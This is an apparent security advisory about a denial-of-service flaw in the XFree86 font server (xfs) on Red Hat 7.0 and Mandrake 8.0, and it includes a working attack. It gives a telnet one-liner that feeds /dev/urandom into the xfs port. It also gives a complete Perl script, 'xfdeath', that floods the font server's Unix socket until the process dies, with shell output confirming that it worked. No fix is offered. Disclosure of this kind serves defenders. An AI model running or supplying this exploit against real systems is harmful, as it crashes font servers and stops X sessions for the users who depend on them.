|
Vulnerability xfs Affected Linux Description xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to suffer from a Denial of Service attack. To cause xfs to stop responding for requests, try to do the fillowing: $ telnet victim xfs </dev/urandom Repeat about 100 (or 1000) times and you get Connection refused message. Regular Xservers can no longer connect, usually crash stating Could not open default font 'fixed' and probably get disabled for 5 minutes if run from inittab. Valentine M. Smith found this originally. Since, this has been confirmed on Mandrake 8.0 as well. The TCP attack against the font server is (obviously) only applicable to font-servers listening to TCP. (Which is probably only the case for systems serving x-terminals.) If we want to kill a font-server running on the Mandrake/Redhat/whatever *default* setup, we have to send the garbage to the Unix-Domain socket instead. [user@userland ~]$ ps -ax|grep xfs 3690 ? S 0:00 xfs -port -1 -daemon -user xfs 3723 pts/2 S 0:00 grep xfs [user@userland ~]$./xfdeath [user@userland ~]$ ps -ax|grep xfs 3780 pts/1 S 0:00 grep xfs [user@userland ~]$cat xfdeath #!/usr/bin/perl -w use Socket; use strict; my ($grab, $line, $garbagebyte,$i,$STOP); sub darned { $STOP=1; } open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!"; $SIG{'PIPE'} = 'darned'; for ($i = 0; $i < 1000; ++$i) { $STOP=0; $grab = shift || '/tmp/.font-unix/fs-1'; socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0) || die "socket: $!"; connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!"; while (!$STOP) { read(GARBAGE, $garbagebyte, 1); print "."; print A_SOCKET $garbagebyte; } } exit; Solution Nothing yet.